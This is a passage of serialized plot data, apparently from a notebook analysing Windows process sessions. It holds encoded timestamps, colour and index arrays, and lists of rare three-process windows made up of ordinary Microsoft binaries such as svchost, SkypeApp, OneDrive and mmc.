"System--\",\"System--\",\"System--\",\"System--\",\"System--\",\"System--\",\"System--\",\"System--\",\"System--\"],\"begin\":{\"__ndarray__\":\"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\",\"dtype\":\"float64\",\"shape\":[352]},\"color\":[\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\"],\"index\":[25,26,27,29,30,32,33,36,37,39,40,42,44,45,47,48,50,51,53,54,56,57,58,60,62,65,67,69,70,71,75,79,80,82,84,86,87,88,91,93,94,96,98,99,101,102,103,104,106,110,113,114,117,118,119,120,122,124,126,128,129,131,133,134,136,137,140,142,143,144,146,148,149,151,152,154,155,158,160,162,165,166,167,168,170,172,174,176,177,179,180,182,184,185,188,190,191,193,195,196,198,199,200,202,203,207,209,210,213,214,215,216,218,220,222,224,225,228,229,230,231,232,233,234,236,237,238,239,240,241,243,244,245,246,247,248,250,251,252,253,254,255,410,422,423,424,425,426,427,428,429,430,431,432,433,434,435,436,437,438,439,440,441,442,443,444,445,446,447,448,449,450,451,452,453,454,455,456,457,458,459,460,461,462,463,464,465,466,467,468,469,470,471,472,473,474,475,476,477,478,479,480,481,482,483,484,485,486,487,488,489,490,491,492,493,494,495,496,497,498,499,500,501,502,503,504,505,506,507,508,509,510,511,512,513,514,515,516,517,518,519,520,521,522,523,524,525,526,527,528,529,530,531,532,533,534,535,536,537,538,539,540,541,542,543,544,545,546,547,548,549,550,551,552,553,554,555,556,557,558,559,560,561,562,563,564,565,566,567,568,569,570,571,572,573,574,575,576,577,578,579,580,581,582,583,584,585,586,587,588,589,590,1101,1102,1103,1104,1105,1106,1107,1108,1109,1110,1111,1112,1113,1114,1115,1116,1117,1118,1119,1120,1121,1122,1123,1124,1125,1126,1127,1128,1129,1130,1131,1132,1133,1134,1135,1136,1137,1138,1139,1140],\"rarest_window3\":[[\"Cmd(name='backgroundTaskHost', params={'backgroundTaskHost', '10.0.18362.1', 'Microsoft\\u00ae Windows\\u00ae Operating System', 'c:/windows/system32/backgroundtaskhost.exe'})\",\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.35.0.152', 'c:/program files/windowsapps/microsoft.skypeapp_14.35.152.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\",\"Cmd(name='svchost', params={'10.0.18362.1', 'Microsoft\\u00ae Windows\\u00ae Operating System', 'svchost', 'c:/windows/system32/svchost.exe'})\"],[\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.35.0.152', 'c:/program files/windowsapps/microsoft.skypeapp_14.35.152.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\",\"Cmd(name='svchost', params={'10.0.18362.1', 'Microsoft\\u00ae Windows\\u00ae Operating System', 'svchost', 'c:/windows/system32/svchost.exe'})\",\"Cmd(name='OneDrive', params={'OneDrive', 'Microsoft OneDrive', 'c:/users/contosoadmin/appdata/local/microsoft/onedrive/onedrive.exe', '20.052.0311.0011'})\"],[\"Cmd(name='OneDrive', params={'OneDrive', 'Microsoft OneDrive', 'c:/users/contosoadmin/appdata/local/microsoft/onedrive/onedrive.exe', '20.052.0311.0011'})\",\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.35.0.152', 'c:/program files/windowsapps/microsoft.skypeapp_14.35.152.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\",\"Cmd(name='svchost', params={'10.0.18362.1', 'Microsoft\\u00ae Windows\\u00ae Operating System', 'svchost', 'c:/windows/system32/svchost.exe'})\"],[\"Cmd(name='SDXHelper', params={'SDXHelper', 'Microsoft Office', '16.0.12730.20270', 'c:/program files/microsoft office/root/office16/sdxhelper.exe'})\",\"Cmd(name='sdxhelper', params={'Microsoft Office', 'sdxhelper', '16.0.12730.20270', 'c:/program files/microsoft office/root/office16/sdxhelper.exe'})\"],[\"Cmd(name='SearchUI', params={'SearchUI', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.752', 'c:/windows/systemapps/microsoft.windows.cortana_cw5n1h2txyewy/searchui.exe'})\",\"Cmd(name='backgroundTaskHost', params={'backgroundTaskHost', '10.0.18362.1', 'Microsoft\\u00ae Windows\\u00ae Operating System', 'c:/windows/system32/backgroundtaskhost.exe'})\",\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.35.0.152', 'c:/program files/windowsapps/microsoft.skypeapp_14.35.152.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\"],[\"Cmd(name='SearchUI', params={'SearchUI', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.752', 'c:/windows/systemapps/microsoft.windows.cortana_cw5n1h2txyewy/searchui.exe'})\",\"Cmd(name='mmc', params={'10.0.18362.1', 'mmc', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.35.0.152', 'c:/program files/windowsapps/microsoft.skypeapp_14.35.152.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\"],[\"Cmd(name='OneDrive', params={'OneDrive', 'Microsoft OneDrive', 'c:/users/contosoadmin/appdata/local/microsoft/onedrive/onedrive.exe', '20.052.0311.0011'})\",\"Cmd(name='mmc', params={'10.0.18362.1', 'mmc', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='SearchUI', params={'SearchUI', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.752', 'c:/windows/systemapps/microsoft.windows.cortana_cw5n1h2txyewy/searchui.exe'})\"],[\"Cmd(name='OneDrive', params={'OneDrive', 'Microsoft OneDrive', 'c:/users/contosoadmin/appdata/local/microsoft/onedrive/onedrive.exe', '20.052.0311.0011'})\",\"Cmd(name='mmc', params={'10.0.18362.1', 'mmc', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='svchost', params={'10.0.18362.1', 'Microsoft\\u00ae Windows\\u00ae Operating System', 'svchost', 'c:/windows/system32/svchost.exe'})\"],[\"Cmd(name='SearchUI', params={'SearchUI', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.752', 'c:/windows/systemapps/microsoft.windows.cortana_cw5n1h2txyewy/searchui.exe'})\",\"Cmd(name='mmc', params={'10.0.18362.1', 'mmc', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.35.0.152', 'c:/program files/windowsapps/microsoft.skypeapp_14.35.152.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\"],[\"Cmd(name='SearchUI', params={'SearchUI', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.752', 'c:/windows/systemapps/microsoft.windows.cortana_cw5n1h2txyewy/searchui.exe'})\",\"Cmd(name='OneDrive', params={'OneDrive', 'Microsoft OneDrive', 'c:/users/contosoadmin/appdata/local/microsoft/onedrive/onedrive.exe', '20.052.0311.0011'})\",\"Cmd(name='svchost', params={'10.0.18362.1', 'Microsoft\\u00ae Windows\\u00ae Operating System', 'svchost', 'c:/windows/system32/svchost.exe'})\"],[\"Cmd(name='SDXHelper', params={'SDXHelper', 'Microsoft Office', '16.0.12730.20270', 'c:/program files/microsoft office/root/office16/sdxhelper.exe'})\",\"Cmd(name='sdxhelper', params={'Microsoft Office', 'sdxhelper', '16.0.12730.20270', 'c:/program files/microsoft office/root/office16/sdxhelper.exe'})\"],[\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.35.0.152', 'c:/program files/windowsapps/microsoft.skypeapp_14.35.152.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\",\"Cmd(name='mmc', params={'10.0.18362.1', 'mmc', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='svchost', params={'10.0.18362.1', 'Microsoft\\u00ae Windows\\u00ae Operating System', 'svchost', 'c:/windows/system32/svchost.exe'})\"],[\"Cmd(name='svchost', params={'10.0.18362.1', 'Microsoft\\u00ae Windows\\u00ae Operating System', 'svchost', 'c:/windows/system32/svchost.exe'})\",\"Cmd(name='mmc', params={'10.0.18362.1', 'mmc', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.35.0.152', 'c:/program files/windowsapps/microsoft.skypeapp_14.35.152.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\"],[\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.35.0.152', 'c:/program files/windowsapps/microsoft.skypeapp_14.35.152.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\",\"Cmd(name='SearchUI', params={'SearchUI', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.752', 'c:/windows/systemapps/microsoft.windows.cortana_cw5n1h2txyewy/searchui.exe'})\",\"Cmd(name='mmc', params={'10.0.18362.1', 'mmc', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='backgroundTaskHost', params={'backgroundTaskHost', '10.0.18362.1', 'Microsoft\\u00ae Windows\\u00ae Operating System', 'c:/windows/system32/backgroundtaskhost.exe'})\",\"Cmd(name='mmc', params={'10.0.18362.1', 'mmc', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.35.0.152', 'c:/program files/windowsapps/microsoft.skypeapp_14.35.152.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\"],[\"Cmd(name='svchost', params={'10.0.18362.1', 'Microsoft\\u00ae Windows\\u00ae Operating System', 'svchost', 'c:/windows/system32/svchost.exe'})\",\"Cmd(name='mmc', params={'10.0.18362.1', 'mmc', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.35.0.152', 'c:/program files/windowsapps/microsoft.skypeapp_14.35.152.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\"],[\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.35.0.152', 'c:/program files/windowsapps/microsoft.skypeapp_14.35.152.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\",\"Cmd(name='mmc', params={'10.0.18362.1', 'mmc', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='OneDrive', params={'OneDrive', 'Microsoft OneDrive', 'c:/users/contosoadmin/appdata/local/microsoft/onedrive/onedrive.exe', '20.052.0311.0011'})\"],[\"Cmd(name='backgroundTaskHost', params={'backgroundTaskHost', '10.0.18362.1', 'Microsoft\\u00ae Windows\\u00ae Operating System', 'c:/windows/system32/backgroundtaskhost.exe'})\",\"Cmd(name='backgroundTaskHost', params={'backgroundTaskHost', '10.0.18362.1', 'Microsoft\\u00ae Windows\\u00ae Operating System', 'c:/windows/system32/backgroundtaskhost.exe'})\",\"Cmd(name='SearchUI', params={'SearchUI', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.752', 'c:/windows/systemapps/microsoft.windows.cortana_cw5n1h2txyewy/searchui.exe'})\"],[\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.35.0.152', 'c:/program files/windowsapps/microsoft.skypeapp_14.35.152.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\",\"Cmd(name='mmc', params={'10.0.18362.1', 'mmc', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='svchost', params={'10.0.18362.1', 'Microsoft\\u00ae Windows\\u00ae Operating System', 'svchost', 'c:/windows/system32/svchost.exe'})\"],[\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.35.0.152', 'c:/program files/windowsapps/microsoft.skypeapp_14.35.152.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\",\"Cmd(name='mmc', params={'10.0.18362.1', 'mmc', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='SearchUI', params={'SearchUI', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.752', 'c:/windows/systemapps/microsoft.windows.cortana_cw5n1h2txyewy/searchui.exe'})\"],[\"Cmd(name='backgroundTaskHost', params={'backgroundTaskHost', '10.0.18362.1', 'Microsoft\\u00ae Windows\\u00ae Operating System', 'c:/windows/system32/backgroundtaskhost.exe'})\",\"Cmd(name='mmc', params={'10.0.18362.1', 'mmc', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.35.0.152', 'c:/program files/windowsapps/microsoft.skypeapp_14.35.152.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\"],[\"Cmd(name='sdxhelper', params={'Microsoft Office', 'sdxhelper', '16.0.12730.20270', 'c:/program files/microsoft office/root/office16/sdxhelper.exe'})\",\"Cmd(name='SDXHelper', params={'SDXHelper', 'Microsoft Office', '16.0.12730.20270', 'c:/program files/microsoft office/root/office16/sdxhelper.exe'})\"],[\"Cmd(name='SearchUI', params={'SearchUI', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.752', 'c:/windows/systemapps/microsoft.windows.cortana_cw5n1h2txyewy/searchui.exe'})\",\"Cmd(name='mmc', params={'10.0.18362.1', 'mmc', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='HxTsr', params={'c:/program files/windowsapps/microsoft.windowscommunicationsapps_16005.11029.20108.0_x64__8wekyb3d8bbwe/hxtsr.exe', 'Microsoft Office', 'HxTsr', '16.0.11029.20104'})\"],[\"Cmd(name='mmc', params={'10.0.18362.1', 'mmc', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.35.0.152', 'c:/program files/windowsapps/microsoft.skypeapp_14.35.152.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\",\"Cmd(name='svchost', params={'10.0.18362.1', 'Microsoft\\u00ae Windows\\u00ae Operating System', 'svchost', 'c:/windows/system32/svchost.exe'})\"],[\"Cmd(name='SearchUI', params={'SearchUI', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.752', 'c:/windows/systemapps/microsoft.windows.cortana_cw5n1h2txyewy/searchui.exe'})\",\"Cmd(name='mmc', params={'10.0.18362.1', 'mmc', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.35.0.152', 'c:/program files/windowsapps/microsoft.skypeapp_14.35.152.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\"],[\"Cmd(name='mmc', params={'10.0.18362.1', 'mmc', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.35.0.152', 'c:/program files/windowsapps/microsoft.skypeapp_14.35.152.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\",\"Cmd(name='svchost', params={'10.0.18362.1', 'Microsoft\\u00ae Windows\\u00ae Operating System', 'svchost', 'c:/windows/system32/svchost.exe'})\"],[\"Cmd(name='backgroundTaskHost', params={'backgroundTaskHost', '10.0.18362.1', 'Microsoft\\u00ae Windows\\u00ae Operating System', 'c:/windows/system32/backgroundtaskhost.exe'})\",\"Cmd(name='mmc', params={'10.0.18362.1', 'mmc', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='SearchUI', params={'SearchUI', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.752', 'c:/windows/systemapps/microsoft.windows.cortana_cw5n1h2txyewy/searchui.exe'})\"],[\"Cmd(name='backgroundTaskHost', params={'backgroundTaskHost', '10.0.18362.1', 'Microsoft\\u00ae Windows\\u00ae Operating System', 'c:/windows/system32/backgroundtaskhost.exe'})\",\"Cmd(name='SDXHelper', params={'SDXHelper', 'Microsoft Office', '16.0.12730.20270', 'c:/program files/microsoft office/root/office16/sdxhelper.exe'})\",\"Cmd(name='sdxhelper', params={'Microsoft Office', 'sdxhelper', '16.0.12730.20270', 'c:/program files/microsoft office/root/office16/sdxhelper.exe'})\"],[\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.56.0.102', 'c:/program files/windowsapps/microsoft.skypeapp_14.56.102.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\",\"Cmd(name='mmc', params={'10.0.18362.1', 'mmc', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='OneDrive', params={'OneDrive', 'Microsoft OneDrive', 'c:/users/contosoadmin/appdata/local/microsoft/onedrive/onedrive.exe', '20.052.0311.0011'})\"],[\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.56.0.102', 'c:/program files/windowsapps/microsoft.skypeapp_14.56.102.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\",\"Cmd(name='mmc', params={'10.0.18362.1', 'mmc', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='svchost', params={'10.0.18362.1', 'Microsoft\\u00ae Windows\\u00ae Operating System', 'svchost', 'c:/windows/system32/svchost.exe'})\"],[\"Cmd(name='Microsoft.Photos', params={'', 'c:/program files/windowsapps/microsoft.windows.photos_2020.19111.24110.0_x64__8wekyb3d8bbwe/microsoft.photos.exe', 'Microsoft.Photos'})\",\"Cmd(name='msoia', params={'c:/program files/microsoft office/root/office16/msoia.exe', 'msoia', 'Microsoft Office', '16.0.12730.20144'})\"],[\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\",\"Cmd(name='SDXHelper', params={'SDXHelper', 'Microsoft Office', '16.0.12730.20270', 'c:/program files/microsoft 